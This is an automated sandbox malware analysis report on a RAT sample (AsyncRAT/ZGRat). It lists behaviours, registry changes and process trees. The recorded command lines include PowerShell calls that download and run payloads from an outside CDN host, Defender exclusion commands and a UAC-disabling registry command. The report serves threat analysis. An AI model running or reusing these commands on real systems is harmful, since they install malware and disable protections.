Malware Analysis Report

2025-08-10 19:35

Sample ID 231115-mtvrjshb4w
Target resources.exe
SHA256 f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Tags
asyncrat zgrat operacert windefault evasion persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a

Threat Level: Known bad

The file resources.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat zgrat operacert windefault evasion persistence rat trojan

UAC bypass

Detect ZGRat V1

AsyncRat

ZGRat

Async RAT payload

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Drops startup file

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies registry class

Delays execution with timeout.exe

Modifies registry key

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-15 10:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-15 10:45

Reported

2023-11-15 10:48

Platform

win7-20231023-en

Max time kernel

118s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

Signatures

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\resources.exe

Processes

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 820

Network

N/A

Files

memory/2124-0-0x0000000000880000-0x0000000000896000-memory.dmp

memory/2124-1-0x0000000074530000-0x0000000074C1E000-memory.dmp

memory/2124-3-0x0000000074530000-0x0000000074C1E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-15 10:45

Reported

2023-11-15 10:48

Platform

win10v2004-20231023-en

Max time kernel

147s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunNihaiersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunihaiVersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\2WinDefault.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\resources.exe N/A
Key created \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4448 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 4448 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 4448 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 3160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 3160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 3160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 4136 wrote to memory of 664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 4136 wrote to memory of 664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 4136 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4136 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 664 wrote to memory of 2184 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 664 wrote to memory of 2184 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 664 wrote to memory of 2184 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2184 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2184 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1640 wrote to memory of 2552 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1640 wrote to memory of 2552 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1640 wrote to memory of 2552 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2184 wrote to memory of 4504 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 2184 wrote to memory of 4504 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 2184 wrote to memory of 4504 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 4504 wrote to memory of 820 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 4504 wrote to memory of 820 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 4504 wrote to memory of 820 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 820 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunihaiVersion.exe
PID 4136 wrote to memory of 376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunihaiVersion.exe
PID 4136 wrote to memory of 376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunihaiVersion.exe
PID 376 wrote to memory of 3680 N/A C:\Users\Public\Music\RunihaiVersion.exe C:\Windows\SysWOW64\cmd.exe
PID 376 wrote to memory of 3680 N/A C:\Users\Public\Music\RunihaiVersion.exe C:\Windows\SysWOW64\cmd.exe
PID 376 wrote to memory of 3680 N/A C:\Users\Public\Music\RunihaiVersion.exe C:\Windows\SysWOW64\cmd.exe
PID 3680 wrote to memory of 2456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\00b65495-88ce-45af-bf00-3dc3c78edb4f.bat

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"

C:\Users\Public\Music\RunNihaiersion.exe

RunNihaiersion.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil.exe

"C:\Users\Public\Music\israil.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"

C:\Users\Public\Music\RunihaiVersion.exe

RunihaiVersion.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil2.exe

"C:\Users\Public\Music\israil2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"

C:\Users\Admin\AppData\Local\Temp\xx.exe

xx.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe

C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe

C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe

C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe

C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
